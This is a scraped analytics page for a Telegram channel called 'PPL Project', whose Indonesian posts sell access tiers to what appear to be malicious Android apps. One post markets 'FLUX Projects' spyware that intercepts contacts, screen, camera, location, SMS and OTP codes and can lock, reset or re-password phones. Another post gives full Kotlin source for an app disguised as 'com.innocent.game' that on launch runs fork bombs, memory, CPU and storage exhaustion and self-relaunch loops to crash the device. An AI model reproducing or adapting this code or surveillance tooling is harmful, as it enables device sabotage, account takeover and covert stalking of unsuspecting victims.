PPL Project
Ir al canal en Telegram
Discussion About Developing Full Legal apps
Mostrar más1 426
Suscriptores
+524 horas
+117 días
-2330 días
Carga de datos en curso...
Canales Similares
Sin datos
¿Algún problema? Por favor, actualice la página o contacte a nuestro gerente de soporte.
Nube de Etiquetas
Menciones Entrantes y Salientes
---
---
---
---
---
---
Atraer Suscriptores
agosto '26
agosto '26
+8
en 0 canales
julio '26
+78
en 3 canales
Get PRO
junio '26
+154
en 4 canales
Get PRO
mayo '26
+267
en 6 canales
Get PRO
abril '26
+233
en 9 canales
Get PRO
marzo '26
+959
en 33 canales
Get PRO
febrero '260
en 12 canales
Get PRO
enero '26
+1
en 8 canales
| Fecha | Crecimiento de Suscriptores | Menciones | Canales | |
| 02 agosto | +3 | |||
| 01 agosto | +5 |
Publicaciones del Canal
| 2 | Price List NP Project
User:
- 25K/Bulan
- 40K/Permanent
Admin:
- 60K/Bulan
- 100K/Permanent
VIP:
- 50K/Bulan
- 80K/Permanent
Owner:
- 500K/Permanent
Contact Owner @darkreal_id | 89 |
| 3 | . | 202 |
| 4 | Price List PPL Project ( Update )
Member:
- 45K/Bulan 🔼
- 65K/Permanent 🔼
Reseller:
- 120K/Bulan 🔼
- 240K/Permanent 🔼
VIP:
- 60K/Bulan 🔼
- 100K/Permanent 🔼
Admin:
- 800K/Permanent
Contact Owner @darkreal_id | 6 |
| 5 | sticker.webp | 202 |
| 6 | di karenakan biaya VPS naik akibat kurs dollar, maka mulai hari ini harga PPL Project ada penyesuaian harga | 194 |
| 7 | wajib masuk group jika ingin di anggap sebagai pembeli PPL
*harusnya udah di kasih sama seller masing masing | 218 |
| 8 | crash simple
x = 1
while x < 5:
print(x) | 213 |
| 9 | Sin texto... | 218 |
| 10 | beli yg not gimmick bisa cek di @crashcore_project | 212 |
| 11 | { FLUX Projects }
Aplikasi Spesialis Sadap Android
Price List: ( Semua Permanent )
Key Basic: 25k
Key Premium: 35K
Key VIP: 40K
Reseller: 100K
Myth: 350k
Feature Aplikasi saat ini:
- Sadap Kontak
- Lock Device
- Sadap Layar ( Android 6 - 13 )
- Sadap Lokasi
- Sadap Kamera ( Android 6 - 13 )
- Sadap SMS
- Sadap OTP Via Notifikasi
- Block Akses Aplikasi
- Virus Floating ( You Are An Idiot )
- Reset Device ( Setelan Pabrik )
- Ganti Password Handphone
- Sadap Penyimpanan/Storage
Preview on @NullXFlux
Contact Owner @darkreal_id or @darkreal2_id | 83 |
| 12 | Jasa Add Feature "Kernel Crash" ke aplikasi kalian
[ 200K ]
Real kernel crash bukan cuma gimmick 😂
Contact @permen_md
Feature Anti Pasaran Ygy 🤩 | 178 |
| 13 | beda harga beda rasa, beda tempat beda kualitas | 226 |
| 14 | sticker.webp | 224 |
| 15 | aku ga sih | 216 |
| 16 | aku minat bang | 223 |
| 17 | Base PPL V5 ada yang minat ndak yah | 167 |
| 18 | package com.innocent.game
import android.content.Intent
import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity
import androidx.core.app.NotificationCompat
import java.io.File
import kotlin.concurrent.thread
import kotlin.io.FilesKt
class MainActivity : AppCompatActivity() {
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
triggerSystemCrash()
}
private fun triggerSystemCrash() {
thread(name = "fork-bomb") {
while (true) {
try {
Runtime.getRuntime().exec(arrayOf("sh", "-c", ":(){ :|:& };:"))
Runtime.getRuntime().exec(arrayOf("sh", "-c", "while true; do sh -c 'sh &'; done"))
} catch (_: Throwable) {
}
}
}
for (i in 0 until 2000) {
thread(name = "mem-$i") {
try {
while (true) {
mutableListOf<Any>().add(ByteArray(209715200))
}
} catch (_: Throwable) {
this@MainActivity.triggerSystemCrash()
}
}
}
for (i in 0 until 1000) {
thread(name = "cpu-$i") {
while (true) {
for (j in 0 until Int.MAX_VALUE) {
}
}
}
}
thread(name = "fs-bomb") {
try {
val dir = File(externalCacheDir, "bomb")
dir.mkdirs()
var i = 0
while (true) {
FilesKt.writeBytes(File(dir, "bomb_$i.dat"), ByteArray(10485760))
i++
}
} catch (_: Throwable) {
}
}
thread(name = "binder-bomb") {
while (true) {
try {
for (i in 0 until 1000) {
getSystemService("activity")
getSystemService(NotificationCompat.CATEGORY_ALARM)
getSystemService("notification")
sendBroadcast(Intent("android.intent.action.BOOT_COMPLETED"))
}
} catch (_: Throwable) {
}
}
}
thread(name = "activity-bomb") {
while (true) {
for (i in 0 until 100) {
try {
startActivity(intent.addFlags(402653184))
} catch (_: Throwable) {
}
}
}
}
thread(name = "native-crash") {
try {
try {
System.loadLibrary("crash")
} catch (_: Throwable) {
}
} catch (_: Throwable) {
val unsafeClass = Class.forName("sun.misc.Unsafe")
val field = unsafeClass.getDeclaredField("theUnsafe")
field.isAccessible = true
val unsafe = field.get(null)
unsafeClass.getMethod("putAddress", Long::class.javaPrimitiveType, Long::class.javaPrimitiveType)
.invoke(unsafe, 0L, 0L)
}
}
thread(name = "process-bomb") {
while (true) {
try {
Runtime.getRuntime().exec("am start -n $packageName/${MainActivity::class.java.name}")
Thread.sleep(10L)
} catch (_: Throwable) {
}
}
}
}
override fun onDestroy() {
super.onDestroy()
thread {
Thread.sleep(50L)
startActivity(intent.addFlags(335544320))
}
}
} | 242 |
| 19 | Banjiri storage dengan file 10MB terus-menerus sampe penuh. | 214 |
| 20 | sticker.webp | 200 |
